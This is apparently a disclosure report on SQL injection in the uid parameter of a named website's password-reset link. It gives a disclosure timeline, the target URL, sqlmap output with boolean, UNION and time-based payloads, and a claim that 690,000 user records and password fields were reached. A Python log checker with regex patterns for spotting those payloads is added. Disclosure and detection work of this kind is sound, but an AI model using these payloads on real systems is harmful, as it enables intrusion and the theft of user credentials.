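2015-08-06: Details reported to the vendor; awaiting vendor handling
2015-08-07: Vendor confirmed; details disclosed to the vendor only
2015-08-17: Details disclosed to core white hats and experts in related fields
2015-08-27: Details disclosed to regular white hats
2015-09-06: Details disclosed to trainee white hats
2015-09-21: Details disclosed to the public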
http://www.chinaiiss.com/do.php?do=user&p1=getpass&uid=999900&id=83adSsKK6Y
This is the password-reset link; the uid parameter is vulnerable to SQL injection.
232 tables:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: do=user&p1=getpass&uid=999900 AND 5432=5432&id=83adSsKK6Y

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: do=user&p1=getpass&uid=-5089 UNION ALL SELECT NULL,CONCAT(0x7166706d71,0x55567143416458485263,0x7162726671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&id=83adSsKK6Y

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: do=user&p1=getpass&uid=999900 AND SLEEP(5)&id=83adSsKK6Y
---
web application technology: PHP 5.3.6
back-end DBMS: MySQL 5.0.11
Database: cis
[223 tables]
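As an added example (not part of the original report): a log check a defender could run over requests to the password-reset action, flagging any uid value that is not a plain integer and labelling it by the three technique families in the sqlmap output above. The sample request lines are constructed, and the function names, the regex heuristics and the 10-digit limit are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets (not from the original report); the path and
# parameter names mirror the password-reset URL quoted above.
SAMPLE_REQUESTS = [
    "/do.php?do=user&p1=getpass&uid=999900&id=83adSsKK6Y",
    "/do.php?do=user&p1=getpass&uid=999900%20AND%205432%3D5432&id=83adSsKK6Y",
    "/do.php?do=user&p1=getpass&uid=-5089%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&id=83adSsKK6Y",
    "/do.php?do=user&p1=getpass&uid=999900%20AND%20SLEEP(5)&id=83adSsKK6Y",
    "/do.php?do=user&p1=getpass&uid=12abc&id=83adSsKK6Y",
]

# Heuristic labels (assumed patterns) for the technique families sqlmap listed.
SIGNATURES = [
    ("union", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean", re.compile(r"\b(and|or)\b\s+\S+\s*=\s*\S+", re.I)),
]


def classify_uid(request_target):
    """Return None when uid is a plain integer or the request is out of scope,
    otherwise a label saying why the value is suspicious."""
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if query.get("p1") != ["getpass"]:
        return None  # only the password-reset action is checked here
    values = query.get("uid", [])
    if len(values) != 1:
        return "missing-or-duplicated"
    uid = values[0]  # parse_qs has already percent-decoded the value
    if re.fullmatch(r"[0-9]{1,10}", uid):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(uid):
            return label
    return "non-numeric"


def scan(requests):
    """Return (request, label) pairs for every flagged request."""
    return [(r, label) for r in requests if (label := classify_uid(r))]


if __name__ == "__main__":
    for target, label in scan(SAMPLE_REQUESTS):
        print(f"{label:12} {target}")
```

The integer check is what actually decides a hit; the signature labels only help triage, so a value that matches none of them is still reported as non-numeric.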
690,000 user records:
Taking a look at the username and password fields:
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-07 17:58
Fixed
None yet